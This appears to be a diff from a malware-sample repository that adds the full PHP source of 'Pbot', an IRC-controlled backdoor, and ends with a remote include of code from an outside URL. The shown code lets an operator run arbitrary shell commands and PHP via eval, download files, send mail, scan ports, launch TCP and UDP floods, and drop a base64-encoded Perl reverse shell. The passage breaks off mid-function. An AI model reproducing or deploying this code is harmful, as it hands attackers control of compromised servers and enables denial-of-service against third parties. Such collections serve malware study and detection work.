function set_nick()
|
||||||
|
{
|
||||||
|
if(isset($_SERVER['SERVER_SOFTWARE']))
|
||||||
|
{
|
||||||
|
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
|
||||||
|
$this->nick = "[A]";
|
||||||
|
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
|
||||||
|
$this->nick = "[I]";
|
||||||
|
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
|
||||||
|
$this->nick = "[X]";
|
||||||
|
else
|
||||||
|
$this->nick = "[U]";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->nick = "[C]";
|
||||||
|
}
|
||||||
|
$this->nick .= $this->config['prefix'];
|
||||||
|
for($i=0;$i<$this->config['maxrand'];$i++)
|
||||||
|
$this->nick .= mt_rand(0,9);
|
||||||
|
$this->send("NICK ".$this->nick);
|
||||||
|
}
|
||||||
|
function udpflood($host,$packetsize,$time) {
|
||||||
|
$this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");
|
||||||
|
$packet = "";
|
||||||
|
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
|
||||||
|
$timei = time();
|
||||||
|
$i = 0;
|
||||||
|
while(time()-$timei < $time) {
|
||||||
|
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
|
||||||
|
fwrite($fp,$packet);
|
||||||
|
fclose($fp);
|
||||||
|
$i++;
|
||||||
|
}
|
||||||
|
$env = $i * $packetsize;
|
||||||
|
$env = $env / 1048576;
|
||||||
|
$vel = $env / $time;
|
||||||
|
$vel = round($vel);
|
||||||
|
$env = round($env);
|
||||||
|
$this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s ");
|
||||||
|
}
|
||||||
|
function tcpflood($host,$packets,$packetsize,$port,$delay)
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
|
||||||
|
$packet = "";
|
||||||
|
for($i=0;$i<$packetsize;$i++)
|
||||||
|
$packet .= chr(mt_rand(1,256));
|
||||||
|
for($i=0;$i<$packets;$i++)
|
||||||
|
{
|
||||||
|
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
fwrite($fp,$packet);
|
||||||
|
fclose($fp);
|
||||||
|
}
|
||||||
|
sleep($delay);
|
||||||
|
}
|
||||||
|
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
|
||||||
|
}
|
||||||
|
function conback($ip,$port)
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
|
||||||
|
$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
|
||||||
|
if (is_writable("/tmp"))
|
||||||
|
{
|
||||||
|
if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
|
||||||
|
$fp=fopen("/tmp/dc.pl","w");
|
||||||
|
fwrite($fp,base64_decode($dc_source));
|
||||||
|
passthru("perl /tmp/dc.pl $ip $port &");
|
||||||
|
unlink("/tmp/dc.pl");
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
if (is_writable("/var/tmp"))
|
||||||
|
{
|
||||||
|
if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
|
||||||
|
$fp=fopen("/var/tmp/dc.pl","w");
|
||||||
|
fwrite($fp,base64_decode($dc_source));
|
||||||
|
passthru("perl /var/tmp/dc.pl $ip $port &");
|
||||||
|
unlink("/var/tmp/dc.pl");
|
||||||
|
}
|
||||||
|
if (is_writable("."))
|
||||||
|
{
|
||||||
|
if (file_exists("dc.pl")) { unlink("dc.pl"); }
|
||||||
|
$fp=fopen("dc.pl","w");
|
||||||
|
fwrite($fp,base64_decode($dc_source));
|
||||||
|
passthru("perl dc.pl $ip $port &");
|
||||||
|
unlink("dc.pl");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
$bot = new pBot;
|
||||||
|
$bot->start();
|
||||||
|
|
||||||
|
?>
|
||||||
|
|
||||||
|
|
||||||
|
<?php include("http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt");?>
|
516
PHP/Backdoor.PHP.Pbot.c
Normal file
516
PHP/Backdoor.PHP.Pbot.c
Normal file
@ -0,0 +1,516 @@
|
|||||||
|
<?
|
||||||
|
|
||||||
|
/*
|
||||||
|
*
|
||||||
|
* #korban. since 2003
|
||||||
|
* edited by: devil__ <admin@xdevil.org>
|
||||||
|
*
|
||||||
|
* COMMANDS:
|
||||||
|
*
|
||||||
|
* .user <password> //login to the bot
|
||||||
|
* .logout //logout of the bot
|
||||||
|
* .die //kill the bot
|
||||||
|
* .restart //restart the bot
|
||||||
|
* .mail <to> <from> <subject> <msg> //send an email
|
||||||
|
* .dns <IP|HOST> //dns lookup
|
||||||
|
* .download <URL> <filename> //download a file
|
||||||
|
* .exec <cmd> // uses exec() //execute a command
|
||||||
|
* .sexec <cmd> // uses shell_exec() //execute a command
|
||||||
|
* .cmd <cmd> // uses popen() //execute a command
|
||||||
|
* .info //get system information
|
||||||
|
* .php <php code> // uses eval() //execute php code
|
||||||
|
* .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
|
||||||
|
* .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
|
||||||
|
* .raw <cmd> //raw IRC command
|
||||||
|
* .rndnick //change nickname
|
||||||
|
* .pscan <host> <port> //port scan
|
||||||
|
* .safe // test safe_mode (dvl)
|
||||||
|
* .inbox <to> // test inbox (dvl)
|
||||||
|
* .conback <ip> <port> // conect back (dvl)
|
||||||
|
* .uname // return shell's uname using a php function (dvl)
|
||||||
|
*
|
||||||
|
*/
|
||||||
|
|
||||||
|
set_time_limit(0);
|
||||||
|
error_reporting(0);
|
||||||
|
echo "ok!";
|
||||||
|
|
||||||
|
class pBot
|
||||||
|
{
|
||||||
|
var $config = array("server"=>"irc.dal.net",
|
||||||
|
"port"=>"7000",
|
||||||
|
"pass"=>"",
|
||||||
|
"prefix"=>"aisen",
|
||||||
|
"maxrand"=>"2",
|
||||||
|
"chan"=>"#aisen",
|
||||||
|
"chan2"=>"#aisen",
|
||||||
|
"key"=>"1988",
|
||||||
|
"modes"=>"+ps",
|
||||||
|
"password"=>"1988",
|
||||||
|
"trigger"=>".",
|
||||||
|
"hostauth"=>"*" // * for any hostname (remember: /setvhost xdevil.org)
|
||||||
|
);
|
||||||
|
var $users = array();
|
||||||
|
function start()
|
||||||
|
{
|
||||||
|
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
|
||||||
|
$this->start();
|
||||||
|
$ident = $this->config['prefix'];
|
||||||
|
$alph = range("0","9");
|
||||||
|
for($i=0;$i<$this->config['maxrand'];$i++)
|
||||||
|
$ident .= $alph[rand(0,9)];
|
||||||
|
if(strlen($this->config['pass'])>0)
|
||||||
|
$this->send("PASS ".$this->config['pass']);
|
||||||
|
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
|
||||||
|
$this->set_nick();
|
||||||
|
$this->main();
|
||||||
|
}
|
||||||
|
function main()
|
||||||
|
{
|
||||||
|
while(!feof($this->conn))
|
||||||
|
{
|
||||||
|
$this->buf = trim(fgets($this->conn,512));
|
||||||
|
$cmd = explode(" ",$this->buf);
|
||||||
|
if(substr($this->buf,0,6)=="PING :")
|
||||||
|
{
|
||||||
|
$this->send("PONG :".substr($this->buf,6));
|
||||||
|
}
|
||||||
|
if(isset($cmd[1]) && $cmd[1] =="001")
|
||||||
|
{
|
||||||
|
$this->send("MODE ".$this->nick." ".$this->config['modes']);
|
||||||
|
$this->join($this->config['chan'],$this->config['key']);
|
||||||
|
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
|
||||||
|
else { $safemode = "off"; }
|
||||||
|
$uname = php_uname();
|
||||||
|
$this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
|
||||||
|
$this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
|
||||||
|
}
|
||||||
|
if(isset($cmd[1]) && $cmd[1]=="433")
|
||||||
|
{
|
||||||
|
$this->set_nick();
|
||||||
|
}
|
||||||
|
if($this->buf != $old_buf)
|
||||||
|
{
|
||||||
|
$mcmd = array();
|
||||||
|
$msg = substr(strstr($this->buf," :"),2);
|
||||||
|
$msgcmd = explode(" ",$msg);
|
||||||
|
$nick = explode("!",$cmd[0]);
|
||||||
|
$vhost = explode("@",$nick[1]);
|
||||||
|
$vhost = $vhost[1];
|
||||||
|
$nick = substr($nick[0],1);
|
||||||
|
$host = $cmd[0];
|
||||||
|
if($msgcmd[0]==$this->nick)
|
||||||
|
{
|
||||||
|
for($i=0;$i<count($msgcmd);$i++)
|
||||||
|
$mcmd[$i] = $msgcmd[$i+1];
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
for($i=0;$i<count($msgcmd);$i++)
|
||||||
|
$mcmd[$i] = $msgcmd[$i];
|
||||||
|
}
|
||||||
|
if(count($cmd)>2)
|
||||||
|
{
|
||||||
|
switch($cmd[1])
|
||||||
|
{
|
||||||
|
case "QUIT":
|
||||||
|
if($this->is_logged_in($host))
|
||||||
|
{
|
||||||
|
$this->log_out($host);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "PART":
|
||||||
|
if($this->is_logged_in($host))
|
||||||
|
{
|
||||||
|
$this->log_out($host);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "PRIVMSG":
|
||||||
|
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
|
||||||
|
{
|
||||||
|
if(substr($mcmd[0],0,1)==".")
|
||||||
|
{
|
||||||
|
switch(substr($mcmd[0],1))
|
||||||
|
{
|
||||||
|
case "user":
|
||||||
|
if($mcmd[1]==$this->config['password'])
|
||||||
|
{
|
||||||
|
$this->log_in($host);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->notice($this->config['chan'],"[\2Auth\2]: Senha errada $nick idiota!!");
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif($this->is_logged_in($host))
|
||||||
|
{
|
||||||
|
if(substr($mcmd[0],0,1)==".")
|
||||||
|
{
|
||||||
|
switch(substr($mcmd[0],1))
|
||||||
|
{
|
||||||
|
case "restart":
|
||||||
|
$this->send("QUIT :restart commando from $nick");
|
||||||
|
fclose($this->conn);
|
||||||
|
$this->start();
|
||||||
|
break;
|
||||||
|
case "mail": //mail to from subject message
|
||||||
|
if(count($mcmd)>4)
|
||||||
|
{
|
||||||
|
$header = "From: <".$mcmd[2].">";
|
||||||
|
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "safe":
|
||||||
|
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
|
||||||
|
{
|
||||||
|
$safemode = "on";
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$safemode = "off";
|
||||||
|
}
|
||||||
|
$this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
|
||||||
|
break;
|
||||||
|
case "inbox": //teste inbox
|
||||||
|
if(isset($mcmd[1]))
|
||||||
|
{
|
||||||
|
$token = md5(uniqid(rand(), true));
|
||||||
|
$header = "From: <inbox".$token."@xdevil.org>";
|
||||||
|
$a = php_uname();
|
||||||
|
$b = getenv("SERVER_SOFTWARE");
|
||||||
|
$c = gethostbyname($_SERVER["HTTP_HOST"]);
|
||||||
|
if(!mail($mcmd[1],"InBox Test","#korban. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <admin@xdevil.org>",$header))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "conback":
|
||||||
|
if(count($mcmd)>2)
|
||||||
|
{
|
||||||
|
$this->conback($mcmd[1],$mcmd[2]);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "dns":
|
||||||
|
if(isset($mcmd[1]))
|
||||||
|
{
|
||||||
|
$ip = explode(".",$mcmd[1]);
|
||||||
|
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "info":
|
||||||
|
case "vunl":
|
||||||
|
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
|
||||||
|
else { $safemode = "off"; }
|
||||||
|
$uname = php_uname();
|
||||||
|
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
|
||||||
|
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
|
||||||
|
break;
|
||||||
|
case "bot":
|
||||||
|
$this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; #korban.");
|
||||||
|
break;
|
||||||
|
case "uname":
|
||||||
|
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
|
||||||
|
else { $safemode = "off"; }
|
||||||
|
$uname = php_uname();
|
||||||
|
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
|
||||||
|
break;
|
||||||
|
case "rndnick":
|
||||||
|
$this->set_nick();
|
||||||
|
break;
|
||||||
|
case "raw":
|
||||||
|
$this->send(strstr($msg,$mcmd[1]));
|
||||||
|
break;
|
||||||
|
case "eval":
|
||||||
|
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
|
||||||
|
break;
|
||||||
|
case "sexec":
|
||||||
|
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
|
||||||
|
$exec = shell_exec($command);
|
||||||
|
$ret = explode("\n",$exec);
|
||||||
|
for($i=0;$i<count($ret);$i++)
|
||||||
|
if($ret[$i]!=NULL)
|
||||||
|
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
|
||||||
|
break;
|
||||||
|
|
||||||
|
case "exec":
|
||||||
|
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
|
||||||
|
$exec = exec($command);
|
||||||
|
$ret = explode("\n",$exec);
|
||||||
|
for($i=0;$i<count($ret);$i++)
|
||||||
|
if($ret[$i]!=NULL)
|
||||||
|
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
|
||||||
|
break;
|
||||||
|
|
||||||
|
case "passthru":
|
||||||
|
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
|
||||||
|
$exec = passthru($command);
|
||||||
|
$ret = explode("\n",$exec);
|
||||||
|
for($i=0;$i<count($ret);$i++)
|
||||||
|
if($ret[$i]!=NULL)
|
||||||
|
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
|
||||||
|
break;
|
||||||
|
|
||||||
|
case "popen":
|
||||||
|
if(isset($mcmd[1]))
|
||||||
|
{
|
||||||
|
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
|
||||||
|
$this->privmsg($this->config['chan'],"[\2popen\2]: $command");
|
||||||
|
$pipe = popen($command,"r");
|
||||||
|
while(!feof($pipe))
|
||||||
|
{
|
||||||
|
$pbuf = trim(fgets($pipe,512));
|
||||||
|
if($pbuf != NULL)
|
||||||
|
$this->privmsg($this->config['chan']," : $pbuf");
|
||||||
|
}
|
||||||
|
pclose($pipe);
|
||||||
|
}
|
||||||
|
|
||||||
|
case "system":
|
||||||
|
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
|
||||||
|
$exec = system($command);
|
||||||
|
$ret = explode("\n",$exec);
|
||||||
|
for($i=0;$i<count($ret);$i++)
|
||||||
|
if($ret[$i]!=NULL)
|
||||||
|
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
|
||||||
|
break;
|
||||||
|
|
||||||
|
|
||||||
|
case "pscan": // .pscan 127.0.0.1 6667
|
||||||
|
if(count($mcmd) > 2)
|
||||||
|
{
|
||||||
|
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
|
||||||
|
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
|
||||||
|
else
|
||||||
|
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "ud.server": // .ud.server <server> <port> [password]
|
||||||
|
if(count($mcmd)>2)
|
||||||
|
{
|
||||||
|
$this->config['server'] = $mcmd[1];
|
||||||
|
$this->config['port'] = $mcmd[2];
|
||||||
|
if(isset($mcmcd[3]))
|
||||||
|
{
|
||||||
|
$this->config['pass'] = $mcmd[3];
|
||||||
|
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "download":
|
||||||
|
if(count($mcmd) > 2)
|
||||||
|
{
|
||||||
|
if(!$fp = fopen($mcmd[2],"w"))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
if(!$get = file($mcmd[1]))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
for($i=0;$i<=count($get);$i++)
|
||||||
|
{
|
||||||
|
fwrite($fp,$get[$i]);
|
||||||
|
}
|
||||||
|
$this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
|
||||||
|
}
|
||||||
|
fclose($fp);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
|
||||||
|
break;
|
||||||
|
case "die":
|
||||||
|
$this->send("QUIT :die command from $nick");
|
||||||
|
fclose($this->conn);
|
||||||
|
exit;
|
||||||
|
case "logout":
|
||||||
|
$this->log_out($host);
|
||||||
|
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!");
|
||||||
|
break;
|
||||||
|
case "udpflood":
|
||||||
|
if(count($mcmd)>3)
|
||||||
|
{
|
||||||
|
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
case "tcpflood":
|
||||||
|
if(count($mcmd)>5)
|
||||||
|
{
|
||||||
|
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
$old_buf = $this->buf;
|
||||||
|
}
|
||||||
|
$this->start();
|
||||||
|
}
|
||||||
|
function send($msg)
|
||||||
|
{
|
||||||
|
fwrite($this->conn,"$msg\r\n");
|
||||||
|
|
||||||
|
}
|
||||||
|
function join($chan,$key=NULL)
|
||||||
|
{
|
||||||
|
$this->send("JOIN $chan $key");
|
||||||
|
}
|
||||||
|
function privmsg($to,$msg)
|
||||||
|
{
|
||||||
|
$this->send("PRIVMSG $to :$msg");
|
||||||
|
}
|
||||||
|
function notice($to,$msg)
|
||||||
|
{
|
||||||
|
$this->send("NOTICE $to :$msg");
|
||||||
|
}
|
||||||
|
function is_logged_in($host)
|
||||||
|
{
|
||||||
|
if(isset($this->users[$host]))
|
||||||
|
return 1;
|
||||||
|
else
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
function log_in($host)
|
||||||
|
{
|
||||||
|
$this->users[$host] = true;
|
||||||
|
}
|
||||||
|
function log_out($host)
|
||||||
|
{
|
||||||
|
unset($this->users[$host]);
|
||||||
|
}
|
||||||
|
function set_nick()
|
||||||
|
{
|
||||||
|
if(isset($_SERVER['SERVER_SOFTWARE']))
|
||||||
|
{
|
||||||
|
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
|
||||||
|
$this->nick = "[A]";
|
||||||
|
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
|
||||||
|
$this->nick = "[I]";
|
||||||
|
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
|
||||||
|
$this->nick = "[X]";
|
||||||
|
else
|
||||||
|
$this->nick = "[U]";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$this->nick = "[C]";
|
||||||
|
}
|
||||||
|
$this->nick .= $this->config['prefix'];
|
||||||
|
for($i=0;$i<$this->config['maxrand'];$i++)
|
||||||
|
$this->nick .= mt_rand(0,9);
|
||||||
|
$this->send("NICK ".$this->nick);
|
||||||
|
}
|
||||||
|
function udpflood($host,$packetsize,$time) {
|
||||||
|
$this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");
|
||||||
|
$packet = "";
|
||||||
|
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
|
||||||
|
$timei = time();
|
||||||
|
$i = 0;
|
||||||
|
while(time()-$timei < $time) {
|
||||||
|
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
|
||||||
|
fwrite($fp,$packet);
|
||||||
|
fclose($fp);
|
||||||
|
$i++;
|
||||||
|
}
|
||||||
|
$env = $i * $packetsize;
|
||||||
|
$env = $env / 1048576;
|
||||||
|
$vel = $env / $time;
|
||||||
|
$vel = round($vel);
|
||||||
|
$env = round($env);
|
||||||
|
$this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s ");
|
||||||
|
}
|
||||||
|
function tcpflood($host,$packets,$packetsize,$port,$delay)
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
|
||||||
|
$packet = "";
|
||||||
|
for($i=0;$i<$packetsize;$i++)
|
||||||
|
$packet .= chr(mt_rand(1,256));
|
||||||
|
for($i=0;$i<$packets;$i++)
|
||||||
|
{
|
||||||
|
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
fwrite($fp,$packet);
|
||||||
|
fclose($fp);
|
||||||
|
}
|
||||||
|
sleep($delay);
|
||||||
|
}
|
||||||
|
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
|
||||||
|
}
|
||||||
|
function conback($ip,$port)
|
||||||
|
{
|
||||||
|
$this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
|
||||||
|
$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
|
||||||
|
if (is_writable("/tmp"))
|
||||||
|
{
|
||||||
|
if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
|
||||||
|
$fp=fopen("/tmp/dc.pl","w");
|
||||||
|
fwrite($fp,base64_decode($dc_source));
|
||||||
|
passthru("perl /tmp/dc.pl $ip $port &");
|
||||||
|
unlink("/tmp/dc.pl");
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
if (is_writable("/var/tmp"))
|
||||||
|
{
|
||||||
|
if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
|
||||||
|
$fp=fopen("/var/tmp/dc.pl","w");
|
||||||
|
fwrite($fp,base64_decode($dc_source));
|
||||||
|
passthru("perl /var/tmp/dc.pl $ip $port &");
|
||||||
|
unlink("/var/tmp/dc.pl");
|
||||||
|
}
|
||||||
|
if (is_writable("."))
|
||||||
|
{
|
||||||
|
if (file_exists("dc.pl")) { unlink("dc.pl"); }
|
||||||
|
$fp=fopen("dc.pl","w");
|
||||||
|
fwrite($fp,base64_decode($dc_source));
|
||||||
|
passthru("perl dc.pl $ip $port &");
|
||||||
|
